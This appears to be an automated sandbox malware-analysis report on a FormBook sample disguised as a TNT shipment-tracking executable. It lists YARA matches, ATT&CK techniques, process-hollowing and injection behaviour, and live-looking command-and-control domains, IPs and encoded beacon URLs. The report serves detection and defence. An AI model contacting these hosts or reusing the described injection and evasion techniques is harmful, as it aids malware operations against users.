0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
          Source: TNT AWB TRACKING DETAILS.exeBinary or memory string: WIN_XPe
          Source: TNT AWB TRACKING DETAILS.exeBinary or memory string: WIN_VISTA
          Source: TNT AWB TRACKING DETAILS.exeBinary or memory string: WIN_7
          Source: TNT AWB TRACKING DETAILS.exeBinary or memory string: WIN_8

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.TNT AWB TRACKING DETAILS.exe.3c20000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000002.3831622606.00000000030D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1508134441.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1507782398.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1451834175.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3836315598.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.1508191054.0000000002BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.3834260366.0000000003290000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
          Source: C:\Users\user\Desktop\TNT AWB TRACKING DETAILS.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4_2_006FF160 RtlStringFromGUID,RtlNtStatusToDosError,memcpy,RtlFreeUnicodeString,CreateFileW,GetLastError,BindIoCompletionCallback,GetLastError,CloseHandle,4_2_006FF160

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire Infrastructure2
          Valid Accounts          		2
          Native API          		1
          DLL Side-Loading          		1
          Exploitation for Privilege Escalation          		1
          Disable or Modify Tools          		1
          Credential API Hooking          		2
          System Time Discovery          		Remote Services1
          Archive Collected Data          		2
          Ingress Tool Transfer          		Exfiltration Over Other Network Medium1
          System Shutdown/Reboot
          CredentialsDomainsDefault Accounts1
          Shared Modules          		2
          Valid Accounts          		1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		21
          Input Capture          		1
          Account Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		1
          Encrypted Channel          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)2
          Valid Accounts          		3
          Obfuscated Files or Information          		Security Account Manager2
          File and Directory Discovery          		SMB/Windows Admin Shares21
          Input Capture          		2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
          Access Token Manipulation          		1
          DLL Side-Loading          		NTDS25
          System Information Discovery          		Distributed Component Object Model3
          Clipboard Data          		12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script512
          Process Injection          		1
          Rootkit          		LSA Secrets241
          Security Software Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Valid Accounts          		Cached Domain Credentials2
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
          Virtualization/Sandbox Evasion          		DCSync3
          Process Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
          Access Token Manipulation          		Proc Filesystem11
          Application Window Discovery          		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt512
          Process Injection          		/etc/passwd and /etc/shadow1
          System Owner/User Discovery          		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1517909 Sample: TNT AWB TRACKING DETAILS.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 33 www.borghardt.xyz 2->33 35 www.xmld101.icu 2->35 37 11 other IPs or domains 2->37 39 Suricata IDS alerts for network traffic 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 47 9 other signatures 2->47 11 TNT AWB TRACKING DETAILS.exe 1 2->11         started        signatures3 45 Performs DNS queries to domains with low reputation 33->45 process4 signatures5 57 Writes to foreign memory regions 11->57 59 Maps a DLL or memory area into another process 11->59 14 svchost.exe 11->14         started        process6 signatures7 61 Modifies the context of a thread in another process (thread injection) 14->61 63 Maps a DLL or memory area into another process 14->63 65 Sample uses process hollowing technique 14->65 67 3 other signatures 14->67 17 explorer.exe 100 1 14->17 injected process8 dnsIp9 27 www.pools-80761.bond 185.53.179.92, 49713, 80 TEAMINTERNET-ASDE Germany 17->27 29 www.walk-in-tubs-30303.bond 185.53.179.93, 49712, 80 TEAMINTERNET-ASDE Germany 17->29 31 3 other IPs or domains 17->31 20 wlanext.exe 17->20         started        process10 signatures11 49 Modifies the context of a thread in another process (thread injection) 20->49 51 Maps a DLL or memory area into another process 20->51 53 Tries to detect virtualization through RDTSC time measurements 20->53 55 Switches to a custom stack to bypass stack traces 20->55 23 cmd.exe 1 20->23         started        process12 process13 25 conhost.exe 23->25         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          TNT AWB TRACKING DETAILS.exe53%ReversingLabsWin32.Backdoor.FormBook
          TNT AWB TRACKING DETAILS.exe100%AviraHEUR/AGEN.1321671
          TNT AWB TRACKING DETAILS.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
          https://excel.office.com0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          http://www.thetrue.oneReferer:0%Avira URL Cloudsafe
          http://www.cyber-eu.digital0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%Avira URL Cloudsafe
          http://www.legendhud.shopReferer:0%Avira URL Cloudsafe
          http://www.tyumk.xyz/jd21/www.alqahtani.site0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-0%Avira URL Cloudsafe
          https://www.stacker.com/arizona/phoenix0%Avira URL Cloudsafe
          http://www.cyber-eu.digital/jd21/0%Avira URL Cloudsafe
          https://wns.windows.com/bat0%Avira URL Cloudsafe
          https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de0%Avira URL Cloudsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri0%Avira URL Cloudsafe
          http://www.r86gd377hi.rent/jd21/www.thetrue.one0%Avira URL Cloudsafe
          www.weight-loss-003.today/jd21/0%Avira URL Cloudsafe
          http://www.pools-80761.bond0%Avira URL Cloudsafe
          http://www.weight-loss-003.today0%Avira URL Cloudsafe
          https://android.notify.windows.com/iOSp0%Avira URL Cloudsafe
          http://www.tvtwenty20sr.topReferer:0%Avira URL Cloudsafe
          http://www.xmld101.icu0%Avira URL Cloudsafe
          http://www.tyumk.xyz/jd21/0%Avira URL Cloudsafe
          http://www.legendhud.shop0%Avira URL Cloudsafe
          https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o0%Avira URL Cloudsafe
          https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc0%Avira URL Cloudsafe
          https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal0%Avira URL Cloudsafe
          https://api.msn.com/rT0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi0%Avira URL Cloudsafe
          http://www.propertiesforrentus11.bondReferer:0%Avira URL Cloudsafe
          http://www.propertiesforrentus11.bond/jd21/100%Avira URL Cloudphishing
          https://word.office.com0%Avira URL Cloudsafe
          http://www.slab-leak-repair-74697.bond0%Avira URL Cloudsafe
          http://www.pools-80761.bond/jd21/www.legendhud.shop0%Avira URL Cloudsafe
          http://www.tvtwenty20sr.top/jd21/0%Avira URL Cloudsafe
          http://www.r86gd377hi.rent/jd21/0%Avira URL Cloudsafe
          https://android.notify.windows.com/iOSJM0%Avira URL Cloudsafe
          http://www.legendhud.shop/jd21/?FjUh5xw=G0sie2NHVCWw+0/kSEW2r2lr5bZg+lb5pplTBgNoV81oGr9NI8ZMsYInSB9p2CdIvtzo&Bl=8pSpW470ix0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark0%Avira URL Cloudsafe
          http://www.thetrue.one/jd21/www.tvtwenty20sr.top0%Avira URL Cloudsafe
          https://outlook.com0%Avira URL Cloudsafe
          http://www.legendhud.shop/jd21/www.borghardt.xyz0%Avira URL Cloudsafe
          http://www.pools-80761.bond/jd21/0%Avira URL Cloudsafe
          http://www.walk-in-tubs-30303.bond/jd21/0%Avira URL Cloudsafe
          http://www.apple0ficial-ld.infoReferer:0%Avira URL Cloudsafe
          https://android.notify.windows.com/iOSZM0%Avira URL Cloudsafe
          http://www.alqahtani.siteReferer:0%Avira URL Cloudsafe
          http://www.borghardt.xyz0%Avira URL Cloudsafe
          http://www.alqahtani.site/jd21/0%Avira URL Cloudsafe
          http://www.slab-leak-repair-74697.bond/jd21/0%Avira URL Cloudsafe
          https://www.yelp.com0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg0%Avira URL Cloudsafe
          http://www.cyber-eu.digitalReferer:0%Avira URL Cloudsafe
          http://www.weight-loss-003.today/jd21/0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-0%Avira URL Cloudsafe
          http://www.walk-in-tubs-30303.bond/jd21/?Bl=8pSpW470ix&FjUh5xw=DIIN6Z9zLP/ZrbxmBcZ1Ou48L9Vhs8Bu5i/IWLuuzYtgkis57dND5dtWqk2syhOy20nI0%Avira URL Cloudsafe
          http://www.tvtwenty20sr.top0%Avira URL Cloudsafe
          http://www.r86gd377hi.rentReferer:0%Avira URL Cloudsafe
          http://www.tyumk.xyz0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark0%Avira URL Cloudsafe
          https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark0%Avira URL Cloudsafe
          http://www.circusenergy.online100%Avira URL Cloudmalware
          https://api.msn.com/v1/news/Feed/Windows?z$0%Avira URL Cloudsafe
          http://www.alqahtani.site/jd21/www.propertiesforrentus11.bond0%Avira URL Cloudsafe
          http://www.r86gd377hi.rent0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist0%Avira URL Cloudsafe
          http://www.walk-in-tubs-30303.bond0%Avira URL Cloudsafe
          http://www.slab-leak-repair-74697.bondReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/0%Avira URL Cloudsafe
          http://www.thetrue.one0%Avira URL Cloudsafe
          http://www.xmld101.icu/jd21/www.walk-in-tubs-30303.bond0%Avira URL Cloudsafe
          http://www.circusenergy.online/jd21/www.cyber-eu.digital100%Avira URL Cloudmalware
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg0%Avira URL Cloudsafe
          https://parade.com/61481/toriavey/where-did-hamburgers-originate0%Avira URL Cloudsafe
          http://www.xmld101.icu/jd21/0%Avira URL Cloudsafe
          http://www.cyber-eu.digital/jd21/www.weight-loss-003.today0%Avira URL Cloudsafe
          http://www.tyumk.xyzReferer:0%Avira URL Cloudsafe
          http://www.borghardt.xyz/jd21/0%Avira URL Cloudsafe
          https://www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yR0%Avira URL Cloudsafe
          http://www.walk-in-tubs-30303.bond/jd21/www.r86gd377hi.rent0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-0%Avira URL Cloudsafe
          http://www.weight-loss-003.todayReferer:0%Avira URL Cloudsafe
          https://api.msn.com/~T0%Avira URL Cloudsafe
          http://www.tvtwenty20sr.top/jd21/www.pools-80761.bond0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb0%Avira URL Cloudsafe
          http://www.weight-loss-003.today/jd21/www.xmld101.icu0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o0%Avira URL Cloudsafe
          http://www.xmld101.icuReferer:0%Avira URL Cloudsafe
          http://www.borghardt.xyz/jd21/www.slab-leak-repair-74697.bond0%Avira URL Cloudsafe
          http://www.slab-leak-repair-74697.bond/jd21/www.tyumk.xyz0%Avira URL Cloudsafe
          https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al0%Avira URL Cloudsafe
          http://www.circusenergy.online/jd21/100%Avira URL Cloudmalware
          https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI090%Avira URL Cloudsafe
          http://www.borghardt.xyzReferer:0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.pools-80761.bond
          		185.53.179.92
          		truetrue
            		unknown
            www.circusenergy.online
            		185.134.245.113
            		truetrue
              		unknown
              www.weight-loss-003.today
              		188.114.96.3
              		truetrue
                		unknown
                www.walk-in-tubs-30303.bond
                		185.53.179.93
                		truetrue
                  		unknown
                  legendhud.shop
                  		77.37.37.36
                  		truetrue
                    		unknown
                    www.xmld101.icu
                    		unknown
                    		unknowntrue
                      		unknown
                      www.slab-leak-repair-74697.bond
                      		unknown
                      		unknowntrue
                        		unknown
                        www.borghardt.xyz
                        		unknown
                        		unknowntrue
                          		unknown
                          www.legendhud.shop
                          		unknown
                          		unknowntrue
                            		unknown
                            www.cyber-eu.digital
                            		unknown
                            		unknowntrue
                              		unknown
                              www.tvtwenty20sr.top
                              		unknown
                              		unknowntrue
                                		unknown
                                www.r86gd377hi.rent
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.thetrue.one
                                  		unknown
                                  		unknowntrue
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    www.weight-loss-003.today/jd21/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.legendhud.shop/jd21/?FjUh5xw=G0sie2NHVCWw+0/kSEW2r2lr5bZg+lb5pplTBgNoV81oGr9NI8ZMsYInSB9p2CdIvtzo&Bl=8pSpW470ixtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.walk-in-tubs-30303.bond/jd21/?Bl=8pSpW470ix&FjUh5xw=DIIN6Z9zLP/ZrbxmBcZ1Ou48L9Vhs8Bu5i/IWLuuzYtgkis57dND5dtWqk2syhOy20nItrue
                                    • Avira URL Cloud: safe
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.thetrue.oneReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.cyber-eu.digitalexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://wns.windows.com/batexplorer.exe, 00000003.00000003.2292994901.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3084837217.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3853190566.000000000899E000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.stacker.com/arizona/phoenixexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000003.00000003.3082423686.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1455360793.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3844572593.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.legendhud.shopReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.cyber-eu.digital/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.tyumk.xyz/jd21/www.alqahtani.siteexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_deexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://excel.office.comexplorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(explorer.exe, 00000003.00000000.1469409871.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2292310130.000000000BD22000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3858182302.000000000BD22000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameriexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.pools-80761.bondexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.weight-loss-003.todayexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.r86gd377hi.rent/jd21/www.thetrue.oneexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.tvtwenty20sr.topReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.tyumk.xyz/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.xmld101.icuexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://android.notify.windows.com/iOSpexplorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.legendhud.shopexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
